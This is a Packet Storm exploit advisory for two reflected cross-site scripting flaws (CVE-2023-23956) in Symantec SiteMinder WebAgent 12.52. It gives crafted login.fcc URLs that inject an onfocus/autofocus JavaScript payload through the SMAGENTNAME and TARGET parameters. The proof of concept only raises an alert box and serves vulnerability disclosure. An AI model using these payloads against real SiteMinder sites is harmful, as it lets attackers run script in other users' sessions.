Symantec SiteMinder WebAgent 12.52 Cross Site Scripting ≈ Packet Storm

Home^[1] Files^[2] News^[3] &[SERVICES_TAB] Contact^[4] Add New^[5]

Change Mirror^[12] Download^[13]

        Exploit Title: Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)
Google Dork: N/A
Date: 18-06-2023
Exploit Author: Harshit Joshi
Vendor Homepage: https://community.broadcom.com/home
Software Link: https://www.broadcom.com/products/identity/siteminder
Version:  12.52
Tested on: Linux, Windows
CVE: CVE-2023-23956
Security Advisory: https://support.broadcom.com/external/content/SecurityAdvisories/0/22221
*Description:*
I am writing to report two XSS vulnerabilities (CVE-2023-23956) that I have
discovered in the  Symantec SiteMinder WebAgent. The vulnerability is
related to the improper handling of user input and has been assigned the
Common Weakness Enumeration (CWE) code CWE-79. The CVSSv3 score for this
vulnerability is 5.4.
Vulnerability Details:
---------------------
*Impact:*
This vulnerability allows an attacker to execute arbitrary JavaScript code
in the context of the affected application.
*Steps to Reproduce:*
*First:*
1) Visit -
https://domain.com/siteminderagent/forms/login.fcc?TYPE=xyz&REALMOID=123&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22
2) After visiting the above URL, click on the "*Change Password*" button,
and the popup will appear.
- The *SMAGENTNAME *parameter is the source of this vulnerability.
*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*
*Second:*
1) Visit -
https://domain.com/siteminderagent/forms/login.fcc?TYPE=123&TARGET=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22
2) After visiting the above URL, click on the "*Change Password*" button,
and the popup will appear.
- The *TARGET *parameter is the source of this vulnerability.
*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*

• Follow us on Twitter^[16]
• Follow us on Facebook^[17]
• Subscribe to an RSS Feed^[18]

File Tags

• ActiveX^[19] (932)
• Advisory^[20] (81,454)
• Arbitrary^[21] (16,100)
• BBS^[22] (2,859)
• Bypass^[23] (1,703)
• CGI^[24] (1,024)
• Code Execution^[25] (7,188)
• Conference^[26] (678)
• Cracker^[27] (841)
• CSRF^[28] (3,324)
• DoS^[29] (23,249)
• Encryption^[30] (2,363)
• Exploit^[31] (51,285)
• File Inclusion^[32] (4,196)
• File Upload^[33] (957)
• Firewall^[34] (821)
• Info Disclosure^[35] (2,729)
• Intrusion Detection^[36] (886)
• Java^[37] (3,004)
• JavaScript^[38] (844)
• Kernel^[39] (6,593)
• Local^[40] (14,401)
• Magazine^[41] (586)
• Overflow^[42] (12,623)
• Perl^[43] (1,423)
• PHP^[44] (5,130)
• Proof of Concept^[45] (2,336)
• Protocol^[46] (3,568)
• Python^[47] (1,514)
• Remote^[48] (30,554)
• Root^[49] (3,571)
• Rootkit^[50] (506)
• Ruby^[51] (609)
• Scanner^[52] (1,633)
• Security Tool^[53] (7,857)
• Shell^[54] (3,165)
• Shellcode^[55] (1,211)
• Sniffer^[56] (893)
• Spoof^[57] (2,190)
• SQL Injection^[58] (16,243)
• TCP^[59] (2,395)
• Trojan^[60] (687)
• UDP^[61] (885)
• Virus^[62] (664)
• Vulnerability^[63] (31,616)
• Web^[64] (9,588)
• Whitepaper^[65] (3,746)
• x86^[66] (961)
• XSS^[67] (17,721)
• Other^[68]

File Archives

• June 2023^[69]
• May 2023^[70]
• April 2023^[71]
• March 2023^[72]
• February 2023^[73]
• January 2023^[74]
• December 2022^[75]
• November 2022^[76]
• October 2022^[77]
• September 2022^[78]
• August 2022^[79]
• July 2022^[80]
• Older^[81]

Systems

• AIX^[82] (428)
• Apple^[83] (1,981)
• BSD^[84] (373)
• CentOS^[85] (57)
• Cisco^[86] (1,921)
• Debian^[87] (6,768)
• Fedora^[88] (1,691)
• FreeBSD^[89] (1,244)
• Gentoo^[90] (4,321)
• HPUX^[91] (879)
• iOS^[92] (346)
• iPhone^[93] (108)
• IRIX^[94] (220)
• Juniper^[95] (67)
• Linux^[96] (45,967)
• Mac OS X^[97] (685)
• Mandriva^[98] (3,105)
• NetBSD^[99] (256)
• OpenBSD^[100] (483)
• RedHat^[101] (13,425)
• Slackware^[102] (941)
• Solaris^[103] (1,610)
• SUSE^[104] (1,444)
• Ubuntu^[105] (8,688)
• UNIX^[106] (9,251)
• UnixWare^[107] (186)
• Windows^[108] (6,558)
• Other^[109]

© 2022 Packet Storm. All rights reserved.